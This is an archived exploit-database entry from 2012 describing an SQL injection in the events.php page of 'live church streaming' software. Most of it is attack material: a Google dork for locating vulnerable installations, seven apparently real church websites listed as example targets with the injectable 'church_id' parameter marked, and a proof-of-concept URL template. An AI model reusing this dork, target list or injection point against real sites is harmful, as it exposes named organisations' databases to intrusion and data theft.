live church streaming (events.php) SQL Injection Vulnerability

2012-10-08T00:00:00
ID 1337DAY-ID-19531
Type zdt
Reporter Mouh Marvel-Dz
Modified 2012-10-08T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #########################################################################
# Exploit Title: [ live church streaming (events.php) SQL Injection Vulnerability ]                 
# Date: [08-10-2012]                                                    
# Author: [Mouh Marvel-Dz]                                    
# Facebook : http://www.facebook.com/mouh.marvel                      
# Category: [webapps]                                                    
# Google dork: intext:Powered by live church streaming inurl:events.php?type=archive church_id=
# Tested on: [Windows 7 ]                                               
#########################################################################

Example Sites : 

http://www.faithministrieslive.com/events.php?type=archive&church_id=106'
http://www.lifepointlebanonlive.com/events.php?type=archive&church_id=68'
http://www.praisecenterlive.com/events.php?type=archive&church_id=50'
http://www.nbwclive.com/events.php?type=archive&church_id=70'
http://www.newgracelive.com/events.php?type=archive&church_id=59'
http://www.worshipandwordlive.com/events.php?type=archive&church_id=107'
http://www.lteelive.com/events.php?type=archive&church_id=79'


and more in Google


[~]Exploit/p0c : http://www.site.com/events.php?type=archive&church_id=[SQLi]


Greetz [ ShinoBi-Dz / Team R00t / Arm4dill0.DZ / Laze De Pique ] 

                     -[Freedom to Palestine]-



#  0day.today [2018-02-16]  #